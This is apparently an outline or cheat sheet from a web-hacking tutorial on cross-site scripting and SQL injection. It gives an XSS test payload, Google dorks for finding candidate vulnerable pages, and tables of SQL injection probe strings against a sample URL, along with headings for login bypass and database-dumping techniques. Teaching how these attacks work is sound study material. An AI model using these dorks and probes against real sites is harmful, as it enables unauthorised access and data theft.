Theory
Risks
Prior knowledge
How it works
Some attacks
Examples
Attack vectors
Bypass WAF
Dorks
<script>alert(1);</script>
inurl:search.php?
inurl:find.php?
inurl:search.html
inurl:find.html
inurl:search.aspx
inurl:find.aspx
DORKS
DATABASE
DB servers:
MySQL (open source),
MSSQL,
MS Access,
Oracle,
PostgreSQL (open source),
SQLite
SQL
SQL stands for Structured Query Language. It is the language used to communicate with the database; because we use it to query the database, it is called a query language.
http://pageweb.com/report.php?id=23
Input : Reaction if it is an integer-based, bracket-enclosed injection
23' : It should cause an error or no output
" : It should cause an error or no output
23 or 1=1 : Output should come, but it may be different output
23 and 1=1 : Output should come, but it may be different output
23 and false : No output
23 and true : Same output
23--+ : Error or no output. Here you can understand that a bracket is used
Input : Reaction if it is a bracket-enclosed, single-quote-based injection
23' : It should cause an error or no output
23" : No error, same output
23' or '1'='1 : Any output should come, but it may be different output
23' and '1'='1 : Any output should come, but it may be different output
23' and false--+ : No output or error
23' and true--+ : No output or error
23') and false--+ : No output
23') and true--+ : Same output
Input : Reaction if it is a bracket-enclosed, double-quote-based injection
23' : No error, same output
23" : Error or no output
23" or "1"="1 : Any output should come, but it may be different output
23" and "1"="1 : Any output should come, but it may be different output
23" and false--+ : No output or error
23" and true--+ : No output or error
23") and false--+ : No output
23") and true--+ : Same output
[1]. Balance.
[2]. Inject.
[3]. Commenting.
ORDER BY
Query : Output
select * from students order by 1 : It will output all the rows and sort them by the first column, which is id
select * from students order by 2 : It will output all the rows and sort them by the second column, which is f_name
select * from students order by 3 : It will output all the rows and sort them by the third column, which is l_name
select * from students order by 4 : It will output all the rows and sort them by the fourth column, which is roll_no
XPATH-Error-Based-Injection-Extractvalue
XPATH-Error-Based-Injection-UpdateXML
Error-Based-Injection-Subquery-Injection
Blind-SQL-Injection
bypass-login-using-sql-injection
Dump-database-from-login-form-sql
time-based-blind-injection
insert-query-injection
group-by-and-order-by-sql-injection
Union-based-Oracle-Injection
Dorks
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=